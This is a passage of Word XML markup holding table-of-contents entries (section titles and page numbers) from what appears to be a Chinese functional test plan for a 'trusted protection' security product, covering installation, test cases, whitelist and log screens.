            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630307 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46F65EE5" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630308" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>8.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>功能测试方案</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630308 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74A362DC" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630309" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>8.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>安装过程</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630309 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B1492CD" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630310" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>9.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试用例列表</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630310 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F508623" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630311" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>10.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>持续免疫系统登录信息</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630311 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F36A103" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630312" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>11.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护功能测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630312 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DCBE80D" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630313" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>11.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>防护控制界面</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630313 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32920D38" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630314" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>11.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>图标统计界面列表显示</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630314 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2811F6A9" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630315" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>11.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>详细日志界面列表显示</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630315 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="543078A7" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630316" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>11.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>机器属性列表显示测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630316 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62916E8A" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630317" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>11.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信白名单界面列表测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630317 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="004A961A" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630318" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>11.6.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>可信防护</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>异常确认界面列表测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630318 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="486D217C" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630319" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
